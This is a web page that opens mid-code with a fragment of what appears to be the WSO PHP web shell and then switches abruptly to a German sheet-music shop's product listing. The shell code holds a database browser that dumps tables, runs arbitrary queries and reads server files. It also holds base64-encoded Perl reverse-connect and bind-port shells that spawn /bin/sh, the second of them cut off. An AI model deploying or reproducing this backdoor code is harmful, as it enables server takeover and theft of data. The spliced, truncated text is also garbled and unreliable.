@mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = "NULL"; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } wsoHeader(); echo "

Sql browser

TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "
File path:
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file
"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICR

Popular Products

The Little Pianist Op.823

By Carl Czerny (1791-1857). Edited by Ruthardt. For piano. Studies. Sheet Music. Published by Edition PetersMusic notes, sheet music, piano, Music notes, sheet music,

Weitere Informationen...

Basic Thumb Position Studies for the Young Cellist

For Cello. Method/Instruction; String - Cello Studies or Collection. Book. 24 pages. Published by Alfred MusicMusic notes, sheet music

Weitere Informationen...

Si tutto canger ; La del ciel nell'arcano profondo : aria di Alidoro per canto e pianoforte

By Gioacchino Antonio Rossini. Edited by Alberto Cametti. For voice and piano. Vocal music. Language: Italian. Published by Noten RoehrMusic notes, sheet music

Weitere Informationen...

Messiah HWV 56

(Oratorio in three parts). By George Frideric Handel (1685-1759). Edited by John Tobin. For violin 2. This edition: Stapled, Urtext edition. Stapled. Single part. HWV 56. Duration 3 hours. Published by Baerenreiter VerlagMusic notes, sheet music,...

Weitere Informationen...

Arias from Oratorios by Women Composers of the Eighteenth Century

By Grazianini de Rossi; Maria Margharita Grimani. Edited by Barbara Jackson. Chamber orchestra. For SA voices, orchestra and basso continuo. Arias. Arias From Oratorios By Women Composers Of The 18th Century, Volume 1. Arias from oratorios with instrumentMusic...

Weitere Informationen...

Whispers of the Passion

By Joseph M. Martin. For Choral (Chamber Orchestra). Harold Flammer Easter. Published by Shawnee PressMusic notes, sheet music

Weitere Informationen...

Three Sacred Works for Soprano, 2 Violins, and organ continuo (cello ad lib)

By Isabella Leonarda; Maria Xaveria Peruchona; Mrs. Wilbraham. Edited by Barbara Jackson. Soprano, 2 violins, organ continuo (cello ad lib). For Soprano voice, 2 violins, organ continuo (cello ad lib). Solo motets and anthem. Motets with instruments....

Weitere Informationen...

2nd Duo de harpe et piano, sol mineur (after 1783)

By Anne-Louise Brillon de Jouy. Edited by Barbara Jackson. Harp and piano. For Harp and Piano. Duet for harp and piano. Duet for harp and piano. Classic. Medium. Sheet music. 60 pages. Published by ClarNan EditionsMusic notes, sheet music, Harp and...

Weitere Informationen...

10 Pieces

(Organ Solo). By Francois Clement Theodore Dubois (1837-1924). Edited by F Harker. For Organ. Organ Collection. 48 pages. G. Schirmer #LB1479. Published by G. SchirmerMusic notes, sheet music

Weitere Informationen...

148 Interludes for Organ

By Andrew Moore, Dom Gregory Murray, and Noel Rawsthorne. For Organ. Service music. Sacred. Intermediate. Book. Published by Kevin Mayhew PublishersMusic notes, sheet music, Organ, Book, Sacred

Weitere Informationen...

Michigan Images

By Marilynn Ham. For Piano. Piano Suite; Piano Supplemental. Recital Suite Series. Late Intermediate/Early Advanced level piece for the Piano Solo event with the National Federation of Music Clubs (NFMC) Festivals Bulletin 2008-2009-2010. SMP Level 7...

Weitere Informationen...

The Overlanders

(Suite for Orchestra). By John Ireland (1879-1962). Edited by Charles Mackerras. For Orchestra (Study Score). Boosey & Hawkes Scores/Books. 116 pages. Boosey & Hawkes #M060033810. Published by Boosey & HawkesMusic notes, sheet music

Weitere Informationen...

El Pajarito!

(The Little Bird). By John Parker, music by Joel Raney. Choir Secular. 2-Part Choir. Choral Octavo. Choral Designs. Multicultural. 12 pages. Published by Alfred MusicMusic notes, sheet music

Weitere Informationen...

(Your Love Keeps Lifting Me) Higher and Higher

By Gary Jackson, Carl Smith, and Raynard Miner. Arranged by Jay Althouse. Choir Secular. 3-Part Mixed Choir (SAB). Choral Octavo. Pop Choral. 12 pages. Published by Alfred MusicMusic notes, sheet music

Weitere Informationen...

3 Songs Without Words

(For Voice or Instrument and Piano). By Paul Ben-Haim (1897-1984). For Bassoon, High Voice, Voice, Piano. Full Score - Study. Standard notation. Published by Theodore Presser CompanyMusic notes, sheet music, Bassoon, High Voice, Voice, Piano, Full...

Weitere Informationen...

(Your Love Has Lifted Me) Higher and Higher

By Gary Jackson, Carl Smith, and Raynard Miner. Arranged by Alan Billingsley. Choir Secular. This edition: Accompaniment CD. Performance / Accompaniment CD only - No Sheet Music included. Pop Choral Series. CD. Published by Alfred MusicMusic notes,...

Weitere Informationen...

The Abduction from the Seraglio (Die Entfuhrung Aus Dem Serail)

(Arrangements for 2 Flutes (or 2 Violins) Performance Score). By Wolfgang Amadeus Mozart (1756-1791). Edited by Edmund Wochter, Elisabeth Weinzierl, and Edmund W. For Violin Duet, Flute Duet. Ensemble. Softcover. 20 pages. Schott Music #ED9961. PublishedMusic...

Weitere Informationen...

(Your Love Keeps Lifting Me) Higher and Higher

By Gary Jackson, Carl Smith, and Raynard Miner. Arranged by Jay Althouse. Choir Secular. This edition: SoundTrax CD. CD; Choral Octavo. Pop Choral. Published by Alfred MusicMusic notes, sheet music

Weitere Informationen...

Bye Bye Baby (Baby Goodbye)

By The Four Seasons. For Choral (TBB). Pop Choral Series. 8 pages. Published by Hal LeonardMusic notes, sheet music

Weitere Informationen...

Strings for All -- Solo-Duet-Trio-Quartet with Optional Piano Accompaniment

(Violin). Arranged by Michael Story and Michael Story. For Violin. Book; Mixed Instruments - Flexible Instrumentation. For All Series. Pop. 24 pages. Published by Alfred MusicMusic notes, sheet music

Weitere Informationen...